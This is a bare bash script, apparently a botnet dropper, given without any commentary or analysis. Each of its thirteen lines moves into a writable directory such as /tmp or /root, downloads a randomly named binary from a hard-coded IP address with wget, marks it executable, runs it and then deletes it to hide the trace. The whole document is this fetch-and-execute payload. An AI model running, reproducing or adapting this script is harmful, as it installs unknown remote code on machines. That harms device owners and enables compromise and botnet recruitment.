#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.182.73.124/earyzq; chmod +x earyzq; ./earyzq; rm -rf earyzq
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.182.73.124/cemtop; chmod +x cemtop; ./cemtop; rm -rf cemtop
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.182.73.124/vtyhat; chmod +x vtyhat; ./vtyhat; rm -rf vtyhat
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.182.73.124/vvglma; chmod +x vvglma; ./vvglma; rm -rf vvglma
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.182.73.124/nvitpj; chmod +x nvitpj; ./nvitpj; rm -rf nvitpj
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.182.73.124/razdzn; chmod +x razdzn; ./razdzn; rm -rf razdzn
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.182.73.124/lnkfmx; chmod +x lnkfmx; ./lnkfmx; rm -rf lnkfmx
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.182.73.124/qvmxvl; chmod +x qvmxvl; ./qvmxvl; rm -rf qvmxvl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.182.73.124/ajoomk; chmod +x ajoomk; ./ajoomk; rm -rf ajoomk
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.182.73.124/fwdfvf; chmod +x fwdfvf; ./fwdfvf; rm -rf fwdfvf
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.182.73.124/atxhua; chmod +x atxhua; ./atxhua; rm -rf atxhua
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.182.73.124/qtmzbn; chmod +x qtmzbn; ./qtmzbn; rm -rf qtmzbn
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.182.73.124/adcvds; chmod +x adcvds; ./adcvds; rm -rf adcvds
